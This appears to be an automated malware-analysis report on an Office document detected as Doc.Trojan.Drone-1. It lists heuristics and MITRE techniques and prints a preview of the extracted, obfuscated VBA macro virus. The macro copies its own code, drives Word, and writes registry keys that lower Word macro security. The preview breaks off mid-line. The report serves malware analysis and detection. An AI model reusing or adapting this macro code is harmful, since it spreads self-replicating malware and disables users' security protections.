Verdict: MALICIOUS
Risk score: 160
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample contains VBA macros that utilize CreateObject and GetObject, indicative of malicious intent to manipulate other applications. The script attempts to write to the registry key HKCU\Software\Microsoft\Office\8.0\Excel\Options\Microsoft Excel Options, likely to establish persistence or load a malicious component. ClamAV detection as Doc.Trojan.Drone-1 further supports its malicious nature.
Heuristics (4)
- ClamAV: Doc.Trojan.Drone-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Drone-1
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17348 bytes | 55d9d0b8737a7b7854a167d7b473882281a9afd937124a85c7917fbe9b7ed42c |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'ThunderDrome by Kernel32
Private Sub InfectExcel()
On Error Resume Next
' The Chr() concatenation decodes to "ThisWorkbook": the macro reads the first
' 1,000 lines of that module's source so it can copy itself elsewhere.
With ThisWorkbook.VBProject.vbcomponents(Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(87) & Chr(111) & Chr(114) & Chr(107) & Chr(66) & Chr(111) & Chr(111) & Chr(107)).codemodule
Code = .lines((2 - (2 - 1)), 1000)
End With
' Decodes to "Word.Application": attach to a running Word instance (GetObject),
' and fall back to starting a new one (CreateObject) if none is found.
Set MsWord = GetObject(, Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
WasOn = (2 - (2 - 1))
If MsWord = "" Then
Set MsWord = CreateObject(Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
WasOn = (4 - (2 + 2))
End If
' With an empty filename argument, Word's System.PrivateProfileString reads and
' writes the registry instead of an INI file; the obfuscated key paths below are
' the registry writes flagged in the Malware Insights summary.
With MsWord.System
' Key decodes to HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel,
' value name "Options6", set to 0.
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
' Key decodes to HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security,
' value name "Level", set to 1 (the lowest Word macro security level).
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
' Same write for Office\10.0\Word\Security, value name "Level", set to 1.
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
' Reads Office\10.0\Word\Security, a value name beginning "Access"; the line is
' cut off here in the extracted preview.
If .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115
```
... (truncated)